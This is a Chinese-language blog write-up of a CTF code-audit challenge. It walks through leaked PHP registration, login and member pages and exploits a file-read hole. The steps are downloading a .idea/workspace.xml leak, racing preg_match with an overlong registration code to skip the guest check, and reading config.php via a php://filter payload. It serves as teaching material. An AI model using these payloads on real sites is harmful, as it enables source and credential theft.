某CTF代码审计题
记一次参加CTF比赛翻车记!
开始还是挺有信心的,毕竟也是经常打一些CTF锻炼,然而比赛发现大佬们平时不显山不漏水的一比赛全出来了!赛后看了一下各题的writeup发现自己的确技不如人啊!借鉴一个案例拿出来分析一下!
正言:
这是入口界面登录+注册,开始注册登录看了一下
有了一个简单的提示:你好啊,但是你好像不是XDSEC的人,所以我就不给你flag啦~~
然而成功误导了我,百度了一番找到XDSEC官网,拿XDSEC的队员名称注册了一番,并无卵用!然后爆破目录、并无任何发现。
思路断了!之后才知道是由于Phpstorm IDE 开发过程中会生成一个.idea的缓存目录(里面包含一些敏感文件)输入url/.idea/workspace.xml 成功下载下来
发现一个zip压缩包(里面是它的源码无疑)下载后
里面只有三个文件注册、登录、用户下面开始我们的代码审计
Register.php
<?php include('config.php'); try{ $pdo = new PDO('mysql:host=localhost;dbname=xdcms', $user, $pass); }catch (Exception $e){ die('mysql connected error'); } $admin = "xdsec"."###".str_shuffle('you_are_the_member_of_xdsec_here_is_your_flag'); $username = (isset($_POST['username']) === true && $_POST['username'] !== '') ? (string)$_POST['username'] : die('Missing username'); $password = (isset($_POST['password']) === true && $_POST['password'] !== '') ? (string)$_POST['password'] : die('Missing password'); $code = (isset($_POST['code']) === true) ? (string)$_POST['code'] : ''; if (strlen($username) > 16 || strlen($username) > 16) { die('Invalid input'); } $sth = $pdo->prepare('SELECT username FROM users WHERE username = :username'); $sth->execute([':username' => $username]); if ($sth->fetch() !== false) { die('username has been registered'); } $sth = $pdo->prepare('INSERT INTO users (username, password) VALUES (:username, :password)'); $sth->execute([':username' => $username, ':password' => $password]); preg_match('/^(xdsec)((?:###|\w)+)$/i', $code, $matches); if (count($matches) === 3 && $admin === $matches[0]) { $sth = $pdo->prepare('INSERT INTO identities (username, identity) VALUES (:username, :identity)'); $sth->execute([':username' => $username, ':identity' => $matches[1]]); } else { $sth = $pdo->prepare('INSERT INTO identities (username, identity) VALUES (:username, "GUEST")'); $sth->execute([':username' => $username]); } echo '<script>alert("register success");location.href="http://ashe666.blog.163.com/blog/./index.html"</script>';
Login.php
<?php session_start(); include('config.php'); try{ $pdo = new PDO('mysql:host=localhost;dbname=xdcms', $user, $pass); }catch (Exception $e){ die('mysql connected error'); } $username = (isset($_POST['username']) === true && $_POST['username'] !== '') ? (string)$_POST['username'] : die('Missing username'); $password = (isset($_POST['password']) === true && $_POST['password'] !== '') ? (string)$_POST['password'] : die('Missing password'); if (strlen($username) > 32 || strlen($password) > 32) { die('Invalid input'); } $sth = $pdo->prepare('SELECT password FROM users WHERE username = :username'); $sth->execute([':username' => $username]); if ($sth->fetch()[0] !== $password) { die('wrong password'); } $_SESSION['username'] = $username; unset($_SESSION['is_logined']); unset($_SESSION['is_guest']); #echo $username; header("Location: member.php"); ?>
Member.php
<?php error_reporting(0); session_start(); include('config.php'); if (isset($_SESSION['username']) === false) { die('please login first'); } try{ $pdo = new PDO('mysql:host=localhost;dbname=xdcms', $user, $pass); }catch (Exception $e){ die('mysql connected error'); } $sth = $pdo->prepare('SELECT identity FROM identities WHERE username = :username'); $sth->execute([':username' => $_SESSION['username']]); if ($sth->fetch()[0] === 'GUEST') { $_SESSION['is_guest'] = true; } $_SESSION['is_logined'] = true; if (isset($_SESSION['is_logined']) === false || isset($_SESSION['is_guest']) === true) { }else{ if(isset($_GET['file'])===false) echo "None"; elseif(is_file($_GET['file'])) echo "you cannot give me a file"; else readfile($_GET['file']); } ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> </head> <body background="./images/1.jpg"> <object type="application/x-shockwave-flash" style="outline:none;" data="http://cdn.abowman.com/widgets/hamster/hamster.swf?" width="300" height="225"><param name="movie" value="http://cdn.abowman.com/widgets/hamster/hamster.swf?"></param><param name="AllowScriptAccess" value="always"></param><param name="wmode" value="opaque"></param></object> <p style="color:orange">你好啊,但是你好像不是XDSEC的人,所以我就不给你flag啦~~</p> </body> </html>
直到member.php发现是一个文件读取漏洞,既然是一个文件读取漏洞而前面看.idea缓存里面有config.php 这样也许就可以获取我们所需要的信息,而漏洞形成是需要条件的下面我们来具体分析一下。
如果你能看懂上面的代码那么应该已经发现漏洞地点了。
漏洞触发地点:
member.php 第28行
<?php error_reporting(0); session_start(); include('config.php'); if (isset($_SESSION['username']) === false) { die('please login first'); } try{ $pdo = new PDO('mysql:host=localhost;dbname=xdcms', $user, $pass); }catch (Exception $e){ die('mysql connected error'); } $sth = $pdo->prepare('SELECT identity FROM identities WHERE username = :username'); $sth->execute([':username' => $_SESSION['username']]); if ($sth->fetch()[0] === 'GUEST') { $_SESSION['is_guest'] = true; } $_SESSION['is_logined'] = true; if (isset($_SESSION['is_logined']) === false || isset($_SESSION['is_guest']) === true) { }else{ if(isset($_GET['file'])===false) echo "None"; elseif(is_file($_GET['file'])) echo "you cannot give me a file"; else readfile($_GET['file']); } ?>
readfile($_GET['file']); 导致文件读取漏洞,漏洞利用的前提是先达到前面的条件
isset($_SESSION['is_logined']) === false || isset($_SESSION['is_guest']) === true
想让他们执行到else语句,必须绕过isset($_SESSION['is_guest']) === true这个判断条件
$sth = $pdo->prepare('SELECT identity FROM identities WHERE username = :username'); $sth->execute([':username' => $_SESSION['username']]); if ($sth->fetch()[0] === 'GUEST') { $_SESSION['is_guest'] = true; }
继续跟踪到register.php
$sth = $pdo->prepare('INSERT INTO users (username, password) VALUES (:username, :password)'); $sth->execute([':username' => $username, ':password' => $password]); preg_match('/^(xdsec)((?:###|\w)+)$/i', $code, $matches); if (count($matches) === 3 && $admin === $matches[0]) { $sth = $pdo->prepare('INSERT INTO identities (username, identity) VALUES (:username, :identity)'); $sth->execute([':username' => $username, ':identity' => $matches[1]]); } else { $sth = $pdo->prepare('INSERT INTO identities (username, identity) VALUES (:username, "GUEST")'); $sth->execute([':username' => $username]); } echo '<script>alert("register success");location.href="http://ashe666.blog.163.com/blog/./index.html"</script>';
这里进行一个判断满足条件
if (count($matches) === 3 && $admin === $matches[0]) { $sth = $pdo->prepare('INSERT INTO identities (username, identity) VALUES (:username, :identity)'); $sth->execute([':username' => $username, ':identity' => $matches[1]]); }
那么我们只需要通过这个判断就可以绕过isset($_SESSION['is_guest']) === true这个条件
$admin = "xdsec"."###".str_shuffle('you_are_the_member_of_xdsec_here_is_your_flag'); $code = (isset($_POST['code']) === true) ? (string)$_POST['code'] : ''; preg_match('/^(xdsec)((?:###|\w)+)$/i', $code, $matches); if (count($matches) === 3 && $admin === $matches[0]) {
而过程就是这个正则
$code 是可控的匹配字符、$matches是返回值储存地址
而上面就是需要让$matches[0]===$admin
而$matches[0]是匹配到的值
$admin的值由于str_shuffle函数是不确定的,当然我们也可以通过爆破来实现,然而我们还有一个更好的方法。
通过$code传入长字符串来让preg_match函数消耗资源(拖延时间)导致后面的语句暂时无法执行,而此时我们的账户已经注册成功了,由于传入大量字符串preg_match不能在短时间内执行完成所以我们可以在这段时间内进行漏洞利用,由于数据库查询是空的所以可以绕过验证。
漏洞复现:
payload:to=reg&did=0&username=coolbreeze&password=coolbreeze&code=xdsec###超长字符串
注册处使用burp拦截修改
这是点击Go
进入登录
直接构造payload:member.php?file=php://filter/resource=config.php
因为前面通过is_file()函数来过滤所以这里通过php伪协议来读取数据
这里成功获取CTF
$flag = "LCTF{pr3_maTch_1s_A_amaz1ng_Function}"
到此结束
本文原创,著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明原链接及出处。
